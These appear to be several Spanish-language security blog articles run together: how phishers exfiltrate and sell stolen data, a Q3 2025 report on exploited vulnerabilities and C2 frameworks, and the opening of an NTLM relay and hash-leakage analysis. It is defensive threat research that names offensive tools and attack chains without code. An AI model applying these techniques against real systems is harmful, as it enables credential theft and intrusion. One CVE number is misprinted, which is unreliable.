A diferencia del método anterior, el script para enviar datos robados no contiene una dirección de correo electrónico, sino una URL de la API de Telegram con un token de bot de Telegram y el ID del chat correspondiente. A veces, el enlace está escrito en el código del formulario HTML de phishing. Los atacantes componen una plantilla de mensaje detallada que se envía al bot tras el ataque. Cómo se ve en el código:

Fragmento de código para el envío de datos

En comparación con el envío de datos por correo electrónico, el uso de bots de Telegram ofrece muchas más posibilidades a los phishers, que utilizan este método con cada vez mayor frecuencia. Por ejemplo, los datos se envían al bot en tiempo real y el operador recibe una notificación instantánea. Los bots desechables suelen utilizarse en ataques más difíciles de rastrear y bloquear. Además, no dependen de la calidad del alojamiento de la página de phishing.

Paneles de control automatizados

Los estafadores más avanzados utilizan software especializado que incluye, por ejemplo, frameworks de pago como BulletProofLink y Caffeine como Plataforma como Servicio (PaaS). Proporcionan una interfaz basada en web (panel de control) para administrar los ataques de phishing.

Los datos recopilados en todas las páginas de phishing bajo el control del atacante se introducen en una sola base de datos que puede consultarse en una cuenta personal.

Envío de datos al panel de control

Estos paneles de control se utilizan para analizar y procesar los datos de las víctimas. La funcionalidad de un panel de control concreto depende de sus parámetros de personalización, pero lo más frecuente es que en ellos se definan las siguientes características:

• Clasificación de las estadísticas recibidas en tiempo real: el número de ataques realizados por hora y país y la posibilidad de filtrar los datos.
• Verificación automática: algunos sistemas pueden comprobar de forma independiente la validez de los datos robados (tarjetas bancarias, nombres de usuario y contraseñas).
• Exportación de datos: extracción de datos en varios formatos para su posterior uso o venta.

Ejemplo de panel de control

Los paneles de control son una herramienta importante en las actividades de los ciberdelincuentes organizados.

Vale decir que, con frecuencia, un ataque puede usar varios de estos métodos de recopilación de datos a la vez.

Envío de datos robados a correos electrónicos y bots de Telegram

Datos de interés para los phishers

Los datos obtenidos durante un ataque de phishing tienen diferentes valores y propósitos. En manos de los ciberdelincuentes, pueden convertirse en un medio de lucro y en una herramienta para lanzar ataques complejos de varias fases.

Según la finalidad de uso, los datos robados pueden clasificarse de la siguiente manera:

• Monetización inmediata: venta de datos “en bruto” (sin procesar) a gran escala o retirada directa de dinero de una cuenta bancaria o un monedero en línea.
  • Datos bancarios: número de tarjeta, fecha de caducidad, nombre del titular y código de seguridad.
  • Accesos a banca online y billeteras electrónicas: inicios de sesión, contraseñas y códigos 2FA de un solo uso.
  • Cuentas con datos de pago vinculados: inicios de sesión y contraseñas de cuentas que contienen datos de tarjetas bancarias, como tiendas en línea, servicios de suscripción o sistemas de pago como Apple Pay o Google Pay.
• Ataques posteriores para una mayor monetización: uso de los datos para lanzar nuevos ataques y obtener más ganancias.
  • Credenciales de cuentas de diversos servicios online: inicios de sesión y contraseñas. Hay que tener en cuenta que a menudo se utiliza una dirección de correo electrónico o un número de teléfono como inicio de sesión, lo que puede tener valor para los atacantes, aunque no tengan la contraseña.
  • Números de teléfono. Se usan para el fraude telefónico (incluso para obtener un código para pasar la 2FA) y el phishing en sistemas de mensajería.
  • Datos personales: nombre completo, fecha de nacimiento, dirección. Se usan en ataques de ingeniería social.
• Ataques selectivos, chantaje, robo de identidad y creación de deepfakes.
  • Datos biométricos: voz, rostro en diferentes ángulos.
  • Escanes y numeración de documentos personales: pasaporte, licencia de conducir, comprobante de jubilación, número de identificación tributaria.
  • Selfies con el documento. Se usan para solicitar préstamos en línea y la verificación de identidad.
  • Cuentas de empresas. Se usan para lanzar ataques selectivos contra empresas.

Hicimos un análisis de los ataques de phishing y estafas realizados entre enero y septiembre de 2025 para determinar qué datos interesaban más a los atacantes. El 88,5% de los ataques tenían como objetivo el robo de cuentas de diversos servicios en línea, mientras que los datos personales del usuario, como el nombre, la dirección y la fecha de nacimiento, ocupaban el segundo lugar (9,5%), y el 2% de los ataques tenían como objetivo los datos de tarjetas bancarias.

Distribución de los ataques por tipo de datos atacados, enero-septiembre de 2025 (descargar)

Venta de datos en mercados clandestinos

Salvo en los ataques en tiempo real y en los de monetización inmediata, los atacantes no usan los datos robados de inmediato. Veamos su recorrido con más detalle.

1. Ventas al por mayor
   Los datos se recopilan y se venden en recursos clandestinos como “dumps”, que son archivos que contienen millones de registros obtenidos en distintas campañas de phishing y de filtraciones. El precio de un archivo de este tipo puede empezar en 50 dólares. Quienes los compran no son tanto los estafadores activos, sino más bien los analistas clandestinos, el siguiente eslabón en la cadena.
2. Clasificación y verificación
   Los analistas filtran los datos por tipo (cuentas de correo electrónico, números de teléfono, datos bancarios, etc.) y luego los verifican mediante scripts automáticos. De este modo se comprueba su validez, así como la posibilidad de reutilización en otros servicios, por ejemplo, autorizarse en Steam o Gmail utilizando un nombre de usuario y contraseña de Facebook. Los datos de un servicio que fueron robados hace varios años pueden funcionar para otro servicio en la actualidad, ya que la gente suele utilizar las mismas contraseñas en muchos recursos. Al mismo tiempo, las cuentas confirmadas con un nombre de usuario y una contraseña válidos en el momento de la venta se venden más caras.
   Los analistas también combinan los datos de usuarios procedentes de distintos ataques. Por ejemplo, una contraseña antigua de una red social pirateada, el nombre de usuario y la contraseña de un formulario de phishing idéntico a un portal gubernamental y un número de teléfono dejado en un sitio de estafa pueden combinarse en un expediente sobre un usuario en particular.
3. Venta en sitios especializados
   Los datos robados suelen venderse en foros de la darknet y a través de Telegram. A menudo, Telegram se utiliza como escaparate con precios, opiniones de clientes, etc.
   

   Ofertas de compra de datos de redes sociales en Telegram

   Los precios de las cuentas pueden fluctuar de forma significativa y dependen de múltiples factores. Por ejemplo, la antigüedad de la cuenta, el saldo de la cuenta, los medios de pago vinculados (tarjeta bancaria, monedero en línea), la presencia de autenticación 2FA y la popularidad del servicio. Así, los precios de las cuentas en tiendas online pueden ser más altos si el acceso a la cuenta se realiza por correo, tiene activada 2FA para la entrada o la cuenta es antigua con un gran número de pedidos completados. En el caso de las cuentas de juegos, por ejemplo en Steam, es importante tener juegos caros en el perfil, y los datos de la banca en línea se venden a un precio elevado si la cuenta de la víctima tiene un saldo elevado y el propio banco goza de una buena reputación.

   La siguiente tabla resume los precios de las cuentas de varios servicios en foros desde principios de 2025*.

   Categoría	Precios	Precio medio
   Criptomonedas	USD 60-400	USD 105
   Bancos	USD 70-2000	USD 350
   Portales gubernamentales	USD 15-2000	USD 82,5
   Redes sociales	USD 0,4-279	USD 3
   Mensajeros instantáneos	USD 0,065-150	USD 2,5
   Tiendas en línea	USD 10-50	USD 20
   Juegos y plataformas de juego	USD 1-50	USD 6
   Portales globales de Internet	USD 0,2-2	USD 0,9
   Documentos personales	USD 0,5-125	USD 15

   *Datos de Kaspersky Digital Footprint Intelligence

4. Objetivos de alto valor y ataques selectivos

   Los objetivos de “alto valor” son de especial interés para los defraudadores. Se trata de usuarios que tienen acceso a información de importancia crítica, como grandes ejecutivos, contables y administradores informáticos.

   Veamos un posible escenario de un ataque selectivo. Los estafadores, después de filtrar los datos de la empresa A, obtienen datos sobre un usuario que trabajó allí y ahora ocupa un puesto directivo en la empresa B. Los estafadores analizan los datos de fuentes abiertas (OSINT) y averiguan el lugar de trabajo actual del usuario. Luego envían a la víctima un correo de phishing en nombre del director general de la empresa B y mencionando detalles antiguos para generar confianza (aunque pueden darse otros escenarios). Habiendo bajado la guardia del usuario, los atacantes obtienen la posibilidad de comprometer a la empresa B para lanzar un posterior ataque.

   Obsérvese que no sólo los usuarios del sector empresarial son objeto de este tipo de ataques selectivos. Los estafadores también pueden sentirse atraídos por los grandes saldos de las cuentas bancarias y la presencia de documentos personales importantes, necesarios para solicitar microcréditos.

Conclusiones

La ruta de los datos robados es una cadena de operaciones optimizada, en la que cada pieza de información se convierte en un bien con un valor definido. Hoy en día, los ataques de phishing utilizan varios sistemas para recopilar y analizar información confidencial. Los datos se envían instantáneamente a los bots de Telegram y a los paneles de control de los atacantes, y luego se clasifican, verifican y monetizan.

Es fundamental entender que los datos, una vez perdidos, no desaparecen sin dejar rastro: más bien se van acumulando, combinando y reutilizando, y pueden volver a usarse contra la víctima meses o incluso años después en forma de ataques selectivos, chantaje o suplantación de identidad. La precaución, el uso de contraseñas únicas y la autenticación multifactor, junto con un monitoreo constante de la huella digital, ya no son una recomendación: son una necesidad en el entorno cibernético actual.

Qué hacer si es víctima de phishing

1. Si su tarjeta bancaria se ha visto comprometida, llame a su banco lo antes posible para bloquearla.
2. Si le han robado sus credenciales, cambie de inmediato la contraseña de la cuenta comprometida y de cualquier otro servicio donde haya usado la misma contraseña o una similar. Establezca una contraseña única para cada cuenta.
3. Active la autenticación multifactor siempre que sea posible.
4. Revise el historial de inicio de sesión de sus cuentas y cierre cualquier sesión sospechosa.
5. Si su cuenta de mensajería o de redes sociales se ha visto comprometida, advierta a sus seres queridos que pueden estar recibiendo mensajes fraudulentos en su nombre.
6. Utilice servicios especializados para verificar si sus datos aparecen en filtraciones.
7. Trate cualquier correo, llamada u oferta inesperada con mayor vigilancia: pueden parecer creíbles gracias al uso de datos comprometidos.

Los atacantes siguieron explotando los problemas de seguridad de WinRAR en el tercer trimestre, y el número total de vulnerabilidades reportadas volvió a aumentar. En este informe, examinaremos las estadísticas sobre vulnerabilidades y exploits publicados, los problemas de seguridad más comunes en Windows y Linux, y las vulnerabilidades que se explotaron en ataques APT que conducen al lanzamiento de frameworks C2 comunes. El informe utiliza datos anonimizados de Kaspersky Security Network, proporcionados de forma voluntaria por nuestros usuarios, así como información de fuentes abiertas.

Estadísticas: vulnerabilidades registradas

Esta sección contiene estadísticas de las vulnerabilidades registradas. Los datos se obtuvieron del portal cve.org.

Veamos el número de CVE registradas por mes durante los últimos 5 años (hasta el tercer trimestre de 2025 inclusive).

Número total de vulnerabilidades publicadas por mes, 2021– 2025 (descargar)

El gráfico muestra que el número de vulnerabilidades publicadas por mes en el tercer trimestre de 2025 sigue siendo superior al de años anteriores. En total, en tres meses se publicaron más de 1000 vulnerabilidades más que en el mismo periodo de 2024. El final del trimestre marca una tendencia al alza del número de CVE reportados, y creemos que el crecimiento continuará en el cuarto trimestre. Sin embargo, es probable que a finales de año el número total de vulnerabilidades publicadas disminuya con respecto al valor de septiembre.

Si observamos la distribución por meses de las vulnerabilidades calificadas como críticas (CVSS > 8,9) en el momento del registro, podemos ver que la cifra del tercer trimestre de 2025 fue un poco inferior a la de 2024.

Número total de vulnerabilidades críticas publicadas cada mes, 2021– 2025 (descargar)

Estadísticas sobre la explotación de vulnerabilidades

La sección contiene estadísticas de uso de exploits para el tercer trimestre de 2025. Los datos correspondientes se obtuvieron de fuentes de acceso público y mediante nuestra telemetría.

Explotación de vulnerabilidades en Windows y Linux

En el tercer trimestre de 2025, los exploits más comunes siguieron siendo los que tenían como objetivo a los productos vulnerables de Microsoft Office.

En la plataforma Windows, las soluciones de Kaspersky detectaron el mayor número de exploits para las siguientes vulnerabilidades:

• CVE-2018-0802: vulnerabilidad de ejecución remota de código en el componente Editor de ecuaciones.
• CVE-2017-11882: otra vulnerabilidad de ejecución remota de código que también afecta a Editor de ecuaciones;
• CVE-2017-0199: vulnerabilidad en Microsoft Office y WordPad que permite a un atacante tomar el control del sistema.

Estas vulnerabilidades suelen ser explotadas por los atacantes con más frecuencia que otras, como mencionamos en informes anteriores. En el tercer trimestre, también vimos que los ciberdelincuentes explotaron vulnerabilidades de tipo Directory Traversal, que se producen al descomprimir archivos en WinRAR. Aunque los exploits que se publicaron al principio para estas vulnerabilidades no representaban una amenaza en entornos reales, los atacantes los modificaron para adaptarlos a sus necesidades.

• CVE-2023-38831: vulnerabilidad de WinRAR que consiste en el manejo incorrecto de objetos que se encuentran en el archivo comprimido. Analizamos en detalle esta vulnerabilidad en el informe del año pasado;
• CVE-2025-6218 (ZDI-CAN-27198), una vulnerabilidad que permite especificar una ruta relativa y descomprimir archivos en un directorio arbitrario. Los ciberdelincuentes pueden desempaquetar el archivo en el directorio de aplicaciones del sistema o el de ejecución automática y ejecutar código malicioso. En el informe del segundo trimestre se ofrece un desglose más detallado de la vulnerabilidad;
• CVE-2025-8088, una vulnerabilidad de día cero similar a CVE-2025-6128, fue detectada durante el análisis de ataques APT. Los atacantes utilizaban NTFS Streams como mecanismo para eludir el control del directorio al que se extraen los archivos. Esta vulnerabilidad se analizará con más detalle más adelante.

Cabe señalar que las vulnerabilidades detectadas en 2025 están por alcanzar la popularidad de la vulnerabilidad de 2023.

Todas las CVE mencionadas pueden emplearse para obtener acceso inicial a sistemas vulnerables. Recomendamos instalar a su debido tiempo las actualizaciones para el software correspondiente.

Evolución del número de usuarios de Windows que se enfrentaron a exploits, T1 2023 – T3 2025. El 100% es el número de usuarios que se enfrentaron a exploits en el primer trimestre de 2023 (descargar)

Según nuestros datos de telemetría, el número de usuarios de Windows que se toparon con exploits en el tercer trimestre aumentó en relación con el período cubierto por el informe anterior. Asimismo, esta cifra es inferior a la del tercer trimestre de 2024.

En los dispositivos Linux, se detectaron con mayor frecuencia exploits de las siguientes vulnerabilidades del núcleo del sistema operativo:

• CVE-2022-0847, vulnerabilidad conocida como Dirty Pipe, que permite elevar privilegios e interceptar el control de aplicaciones en ejecución;
• CVE-2019-13272: vulnerabilidad de manejo incorrecto de privilegios heredados, que puede utilizarse para elevar privilegios;
• CVE-2021-22555: vulnerabilidad de desbordamiento de montículo (heap overflow) en el subsistema del núcleo Netfilter. La amplia difusión de esta vulnerabilidad se debe a que para explotarla se utilizaron metodologías bastante populares de modificación de memoria, las manipulaciones con los primitivos msg_msg, que conducen a Use-After-Free.

Evolución del número de usuarios de Linux que se enfrentaron a exploits, T1 de 2023 – T3 de 2025. El 100% es el número de usuarios que se enfrentaron a exploits en el primer trimestre de 2023 (descargar)

Si nos fijamos en el número de usuarios que se enfrentaron a exploits, vemos que sigue creciendo y que en el tercer trimestre de 2025 ya es más de seis veces superior que en el primer trimestre de 2023.

Esto confirma una vez más que es crucial mantener actualizados los parches de seguridad en Linux, pues los atacantes lo eligen cada vez más, año tras año. Esto se debe, ante todo, al creciente número de dispositivos Linux.

Los exploits publicados más difundidos

En el tercer trimestre de 2025, los exploits para vulnerabilidades del sistema operativo siguieron prevaleciendo sobre los exploits de otros tipos de software que monitorizamos como parte de nuestras investigaciones públicas, noticias y monitorización de PoC. Cabe señalar, sin embargo, que la proporción de ataques a navegadores aumentó de forma notable en el tercer trimestre y llegó a igualar la proporción de ataques a otros tipos de software que no forman parte del sistema operativo

Distribución de los exploits publicados para vulnerabilidades por plataforma, T1 de 2025 (descargar)

Distribución de los exploits publicados para vulnerabilidades por plataforma, T2 de 2025 (descargar)

Distribución de los exploits publicados para vulnerabilidades por plataforma, T3 de 2025 (descargar)

Cabe destacar que en el tercer trimestre de 2025, al igual que en el segundo trimestre, no se publicaron nuevos exploits para productos de Microsoft Office, pero sí para vulnerabilidades de Microsoft Sharepoint. Dado que estas mismas vulnerabilidades también afectan a componentes del sistema operativo, las clasificamos como vulnerabilidades del sistema operativo.

Uso de vulnerabilidades en ataques APT

Llevamos a cabo un análisis de los datos sobre vulnerabilidades explotadas en ataques de grupos APT en el tercer trimestre de 2025. Las siguientes clasificaciones incluyen datos que recibimos de nuestra telemetría, investigación y fuentes públicas.

Las 10 principales vulnerabilidades explotadas en ataques APT, tercer trimestre de 2025 (descargar)

En el tercer trimestre de 2025, en los ataques APT predominan vulnerabilidades de día cero que se revelaron durante investigaciones de incidentes aislados. Una vez publicadas, empezó una gran oleada de exploits. A juzgar por la lista de programas que contienen estas vulnerabilidades, estamos asistiendo a la formación de un nuevo “kit estándard” para el acceso inicial a la infraestructura y la ejecución de código tanto en dispositivos periféricos como dentro de los sistemas operativos. Además, cabe señalar que las vulnerabilidades “veteranas”, como CVE-2017-11882, por ejemplo, permiten utilizar diferentes formatos de datos y ofuscar el exploit para eludir la detección. A su vez, la mayoría de las nuevas vulnerabilidades requieren un formato de datos de entrada específico, lo que hace que los exploits sean más fáciles de detectar y permite un seguimiento más preciso de su uso en infraestructuras protegidas. No obstante, el riesgo de explotación es bastante alto, por lo que recomendamos aplicar las actualizaciones que los proveedores ya han publicado.

Frameworks C2

En esta sección analizaremos los frameworks C2 más populares utilizados por atacantes y las vulnerabilidades y exploits que interactuaron con agentes C2 en ataques APT.

La gráfica siguiente muestra la frecuencia de casos documentados de uso de frameworks C2 en ataques lanzados durante el tercer trimestre de 2025, según fuentes abiertas.

TOP 10 de frameworks C2 utilizados por grupos APT para comprometer sistemas de usuarios, tercer trimestre de 2025 (descargar)

La lista de los frameworks C2 más populares del último trimestre está encabezada por Metasploit, cuya cuota creció con respecto al segundo trimestre, seguido de Sliver y Mythic. El framework Empire, que no estuvo activo en el último periodo de referencia, también ha vuelto a la lista. Adaptix C2 merece una mención especial, ya que, aunque de reciente aparición, se utilizó casi de inmediato en ataques reales. Las fuentes examinadas y las muestras de agentes C2 maliciosos mostraron que se utilizaron las siguientes vulnerabilidades para lanzarlos y luego introducirlos en la red de la víctima:

• CVE-2020-1472, una vulnerabilidad conocida como ZeroLogon permite comprometer un sistema operativo vulnerable y ejecutar comandos como usuario con privilegios;
• CVE-2021-34527, una vulnerabilidad conocida como PrintNightmare, aprovecha fallos en el subsistema de impresoras del sistema operativo Windows. Además, permite el acceso remoto a un sistema operativo vulnerable y la ejecución de comandos en él con privilegios elevados;
• CVE-2025-6218 o CVE-2025-8088 son vulnerabilidades similares de Directory Traversal que permiten descomprimir archivos comprimidos en una ruta predefinida sin que el archivador muestre ningún mensaje al usuario. La primera fue descubierta por investigadores, pero luego fue adoptada por los ciberdelincuentes. La segunda es una vulnerabilidad de día cero.

Vulnerabilidades interesantes

Esta sección contiene las vulnerabilidades más interesantes que se publicaron en el tercer trimestre de 2025 y tienen una descripción puesta a disposición del público.

ToolShell (CVE-2025-49704 y CVE-2025-49706, CVE-2025-53770 y CVE-2025-53771) provoca la deserialización insegura y la elusión del mecanismo de autenticación

ToolShell es un conjunto de vulnerabilidades en Microsoft SharePoint que permite eludir la autenticación y obtener el control total del servidor.

• CVE-2025-49704 afecta la deserialización insegura de datos no fiables, lo que permite a los ciberdelincuentes ejecutar código malicioso en un servidor vulnerable
• CVE-2025-49706 permite acceder a un servidor saltándose la autenticación
• CVE-2025-53770 permite eludir el parche para CVE-2025-49704
• CVE-2025-53771 permite eludir el parche para CVE-2025-49706

Estas vulnerabilidades son uno de los paquetes favoritos de los atacantes, ya que permiten usar unas cuantas solicitudes para comprometer los servidores Sharepoint disponibles en la red. Todas ellas fueron parchadas en julio. Esto subraya una vez más la importancia de instalar a tiempo los parches críticos. Encontrará una descripción detallada de las vulnerabilidades de ToolShell en nuestro blog.

CVE-2025-8088 es una vulnerabilidad de catálogo en WinRAR

CVE-2025-8088 es muy similar a CVE-2025-6218, sobre la que escribimos en nuestro informe anterior. En ambos casos, los atacantes utilizan rutas relativas para forzar a WinRAR a extraer el contenido de los archivos a directorios del sistema. La única diferencia de esta vulnerabilidad es que el ciberdelincuente explota el mecanismo de flujos de datos alternativos (ADS) y puede utilizar variables de entorno en la ruta donde se descomprimirá el archivo.

CVE-2025-41244 es una vulnerabilidad de escalada de privilegios en VMware Aria Operations y VMware Tools

Los detalles sobre esta vulnerabilidad han sido publicados por investigadores que afirman que fue explotada en ataques reales en 2024.

La esencia de la vulnerabilidad radica en que un atacante puede sustituir la orden utilizada para lanzar el componente de descubrimiento de servicios (Service Discovery) de la consola VMware Aria o del conjunto de utilidades VMware Tools. Como resultado, un atacante sin privilegios puede obtener privilegios ilimitados en una máquina virtual. La vulnerabilidad en sí reside en una expresión regular mal escrita en el script get-versions.sh del componente Service Discovery, que se encarga de identificar la versión del servicio y se ejecuta cada vez que se pasa un nuevo comando.

Conclusiones y recomendaciones

En el tercer trimestre de 2025, el número de vulnerabilidades notificadas sigue creciendo, y algunas de ellas son detectadas casi de inmediato por los atacantes. Es probable que esta tendencia continúe en el futuro.

Los exploits más comunes para Windows se utilizan para la penetración inicial en el sistema. También es durante esta fase cuando las APT explotan nuevas vulnerabilidades. Para evitar el acceso de los atacantes a la infraestructura, las organizaciones deben revisar sus sistemas de forma regular en busca de vulnerabilidades y aplicar parches de manera oportuna. Estas medidas pueden simplificarse y automatizarse con Kaspersky Systems Management. Además, Kaspersky Next puede proporcionar una protección completa y flexible contra ciberataques de cualquier nivel de complejidad.

Tal como en los años 2000

Los teléfonos plegables ganaban popularidad, Windows XP debutaba en las computadoras personales, Apple presentaba el iPod, el intercambio de archivos mediante torrents despegaba y MSN Messenger dominaba el chat en línea. Ese era el panorama tecnológico en 2001. Ese mismo año, Sir Dystic, del grupo Cult of the Dead Cow, publicó SMBRelay, una prueba de concepto que llevó los ataques de NTLM relay de la teoría a la práctica y demostró una nueva y poderosa clase de exploits.

Desde aquel lejano 2001, las debilidades del protocolo de autenticación NTLM quedaron expuestas. En los años siguientes, nuevas vulnerabilidades y métodos de ataque cada vez más sofisticados siguieron moldeando el panorama de la seguridad. Microsoft aceptó el desafío, introdujo medidas de mitigación y, poco a poco, fue desarrollando al sucesor de NTLM: Kerberos. Sin embargo, más de dos décadas después, NTLM continúa integrado en los sistemas operativos modernos y sigue presente en redes corporativas, aplicaciones legacy e infraestructuras internas que aún dependen de sus mecanismos obsoletos de autenticación.

Aunque Microsoft anunció su intención de retirar NTLM, el protocolo todavía está presente y mantiene una puerta abierta para los atacantes, que continúan explotando tanto vulnerabilidades antiguas como otras descubiertas recientemente.

En esta publicación analizaremos en mayor detalle el creciente número de vulnerabilidades relacionadas con NTLM descubiertas durante el último año, así como las campañas cibercriminales que las han aprovechado activamente en distintas regiones del mundo.

Cómo funciona la autenticación NTLM

NTLM (New Technology LAN Manager) es un conjunto de protocolos de seguridad de Microsoft diseñado para ofrecer autenticación, integridad y confidencialidad a los usuarios.

En lo que respecta a la autenticación, NTLM es un protocolo de desafío-respuesta que se utiliza en entornos Windows para autenticar clientes y servidores. Este tipo de protocolos depende de un secreto compartido, por lo general la contraseña del cliente, para verificar la identidad. NTLM se integra sobre los protocolos de aplicación, como HTTP, MSSQL, SMB y SMTP, cuando se requiere autenticación de usuario. Emplea un “three-way handshake” (negociación en tres pasos) entre el cliente y el servidor para completar el proceso de autenticación. En algunos casos se añade un cuarto mensaje para garantizar la integridad de los datos.

El proceso completo de autenticación es el siguiente:

1. El cliente envía un NEGOTIATE_MESSAGE para anunciar sus capacidades.
2. El servidor responde con un CHALLENGE_MESSAGE para verificar la identidad del cliente.
3. El cliente cifra el desafío con su secreto y responde con un AUTHENTICATE_MESSAGE que incluye el desafío cifrado, el nombre de usuario, el nombre del host y el nombre de dominio.
4. El servidor verifica el desafío cifrado mediante el hash de la contraseña del cliente y confirma su identidad. El cliente se autentica y establece una sesión válida con el servidor. Según el protocolo de la capa de aplicación, el servidor puede enviar un mensaje de confirmación (o falla) de la autenticación.

Es importante remarcar que el secreto del cliente nunca viaja por la red durante este proceso.

NTLM ha muerto; larga vida a NTLM

Pese a ser un protocolo heredado con debilidades bien documentadas, NTLM sigue utilizándose en sistemas Windows y, por tanto, se explota de forma activa en campañas de amenazas modernas.

Microsoft anunció planes para eliminar por completo la autenticación NTLM. Este proceso comenzará con Windows 11 24H2 y Windows Server 2025 (1, 2, 3), donde NTLMv1 se eliminará por completo y NTLMv2 se desactivará de forma predeterminada en determinados escenarios. A pesar de que se publicaron al menos tres avisos públicos importantes desde 2022 y de una mayor cantidad de documentación y guías de migración, el protocolo persiste, a menudo debido a requisitos de compatibilidad, aplicaciones heredadas o errores de configuración en infraestructuras híbridas.

Como demuestran revelaciones recientes, los atacantes siguen encontrando formas creativas de aprovechar NTLM en ataques de relay y spoofing, incluso mediante nuevas vulnerabilidades. Además, introducen vectores de ataque alternativos inherentes al protocolo, que se analizarán más adelante en esta publicación, en particular en el contexto de descargas automáticas y ejecución de malware mediante WebDAV tras intentos de autenticación NTLM.

Amenazas persistentes en la autenticación basada en NTLM

NTLM, con sus limitaciones estructurales, expone a las organizaciones a una amplia gama de amenazas. Entre ellos se incluyen el reenvío de credenciales (credential forwarding), los ataques basados en coerción, la intercepción de hashes y diversas técnicas de intermediario (Man-in-the-Middle, MitM), que explotan la falta de controles modernos en el protocolo, como el channel binding y la autenticación mutua. Antes de analizar las campañas de explotación actuales, es esencial repasar las principales técnicas de ataque implicadas.

Filtración de hashes

La filtración de hashes (hash leakage) es la divulgación no intencionada de hashes de autenticación NTLM, que suele producirse mediante archivos diseñados de forma especial, rutas de red maliciosas o técnicas de phishing. Se trata de una técnica pasiva que no requiere acciones directas del atacante en el sistema objetivo. Un escenario común con este vector de ataque comienza con un intento de phishing que incluye (o enlaza con) un archivo diseñado para explotar comportamientos nativos de Windows. Estos comportamientos inician de forma automática la autenticación NTLM hacia recursos controlados por el atacante. La filtración suele producirse con una interacción mínima del usuario, como previsualizar un archivo, hacer clic en un enlace remoto o acceder a un recurso compartido de red. Una vez que los atacantes obtienen los hashes, pueden reutilizarlos en un ataque de reenvío de credenciales.

Ataques basados en coerción

En los ataques basados en coerción, el atacante fuerza de manera activa al sistema objetivo para que se autentique frente a un servicio controlado por el propio atacante. Este tipo de ataque no requiere interacción del usuario. Por ejemplo, herramientas como PetitPotam o PrinterBug se usan con frecuencia para forzar intentos de autenticación a través de protocolos como MS‑EFSRPC o MS‑RPRN. Una vez que el sistema de la víctima inicia el handshake NTLM, el atacante puede interceptar el hash de autenticación o retransmitirlo a un objetivo diferente, y así hacerse pasar por la víctima en otro sistema. Este último caso tiene un impacto alto, ya que permite acceder de inmediato a recursos compartidos, interfaces de administración remota o incluso a Active Directory Certificate Services, donde los atacantes pueden solicitar certificados de autenticación válidos.

Reenvío de credenciales

El reenvío de credenciales consiste en la reutilización no autorizada de tokens de autenticación NTLM capturados en ocasiones anteriores (por lo general hashes) para hacerse pasar por un usuario en otro sistema o servicio. En entornos donde la autenticación NTLM sigue habilitada, los atacantes pueden aprovechar credenciales obtenidas en ocasiones anteriores (mediante filtración de hashes o ataques basados en coerción) sin necesidad de descifrar contraseñas. Esta técnica se aplica con frecuencia mediante Pass‑the‑Hash (PtH) o técnicas de suplantación de tokens. En redes donde NTLM se mantiene en uso, en especial si junto con configuraciones incorrectas de single sign‑on (SSO) o relaciones de confianza entre dominios, el reenvío de credenciales puede proporcionar un acceso amplio a varios sistemas.

Esta técnica se utiliza a menudo para facilitar el movimiento lateral y la escalada de privilegios, sobre todo cuando se exponen credenciales de alto privilegio. Herramientas como Mimikatz permiten extraer e inyectar hashes NTLM directo en memoria, mientras que scripts como wmiexec.py, PsExec.py y secretsdump.py de Impacket pueden emplearse para ejecutar código de forma remota o extraer credenciales mediante hashes reenviados.

Ataques Man‑in‑the‑Middle (MitM)

Un atacante situado entre un cliente y un servidor puede interceptar, retransmitir o manipular el tráfico de autenticación para capturar hashes NTLM o inyectar cargas maliciosas durante la negociación de la sesión. En entornos donde no se han habilitado controles como el firmado digital o channel binding, estos ataques no solo resultan posibles, sino además bastante fáciles de ejecutar.

Entre los ataques MitM, NTLM relay sigue siendo el método más persistente y con mayor impacto, al punto de seguir siendo relevante más de dos décadas después. Demostrado por primera vez en 2001 mediante la herramienta SMBRelay de Sir Dystic (miembro de Cult of the Dead Cow), NTLM relay continúa utilizándose de forma activa para comprometer entornos de Active Directory en escenarios reales. Entre las herramientas de uso más común se encuentran Responder, NTLMRelayX de Impacket e Inveigh. Cuando un ataque de NTLM relay se ejecuta en la misma máquina desde la que se obtuvo el hash, se conoce también como ataque de reflexión NTLM (NTLM reflection attack).

Explotación en 2025

Durante el último año se identificaron varias vulnerabilidades en entornos Windows donde NTLM sigue habilitado de manera implícita. En esta sección se destacan los CVE más relevantes reportados a lo largo del año y los principales vectores de ataque observados en campañas reales.

CVE‑2024‑43451

CVE‑2024‑43451 es una vulnerabilidad en Microsoft Windows que permite la filtración de hashes NTLMv2 con una interacción mínima o nula del usuario, lo que puede derivar en el compromiso de credenciales.

La vulnerabilidad existe debido a la presencia del motor MSHTML, un componente heredado desarrollado para Internet Explorer. Aunque Internet Explorer se retiró de forma oficial, MSHTML sigue integrado en sistemas Windows modernos para garantizar la compatibilidad con aplicaciones e interfaces que aún dependen de sus capacidades de renderizado o administración de enlaces. Esta dependencia permite que archivos .url invoquen procesos de autenticación NTLM de forma silenciosa a través de enlaces manipulados, incluso sin que se los abra. Aunque abrir el archivo .url malicioso de forma directa garantiza que el exploit se active, la vulnerabilidad también puede activarse mediante otras acciones del usuario, como hacer clic derecho, eliminarlo, seleccionarlo o moverlo a otra carpeta.

Los atacantes pueden explotar esta falla iniciando la autenticación NTLM mediante SMB a un servidor remoto bajo su control (especificado mediante una URL en formato de ruta UNC), lo que les permite capturar el hash del usuario. Una vez obtenido el hash NTLMv2, el atacante puede ejecutar un ataque Pass‑the‑Hash (por ejemplo, con herramientas como WMIExec o PsExec) para obtener acceso a la red haciéndose pasar por un usuario válido, sin necesidad de conocer sus credenciales reales.

Un caso particular de esta vulnerabilidad se presenta cuando los atacantes utilizan servidores WebDAV, un conjunto de extensiones del protocolo HTTP que permite la colaboración en archivos almacenados en servidores web. En este escenario, una interacción mínima con el archivo malicioso, como un clic único o un clic con el botón derecho, desencadena la conexión automática al servidor, la descarga del archivo y su ejecución. Los atacantes aprovechan esta falla para distribuir malware u otras cargas en el sistema de la víctima. También puede combinar este proceso con la filtración de hashes, por ejemplo, instalando una herramienta maliciosa en el sistema objetivo y utilizando los hashes capturados para realizar movimiento lateral con esa misma herramienta.

Microsoft solucionó la vulnerabilidad en las actualizaciones de seguridad de noviembre de 2024. En los entornos parcheados, mover, eliminar, hacer clic con el botón derecho sobre el archivo .url manipulado, etc., ya no desencadena la conexión a un servidor malicioso. Sin embargo, si el usuario abre el archivo explotado, el ataque sigue funcionando.

Tras la divulgación, el número de ataques que explotaban esta vulnerabilidad creció de forma exponencial. Para julio de este año habíamos detectado alrededor de 600 archivos .url sospechosos que presentan las características necesarias para explotar la vulnerabilidad y que pueden representar una amenaza potencial.

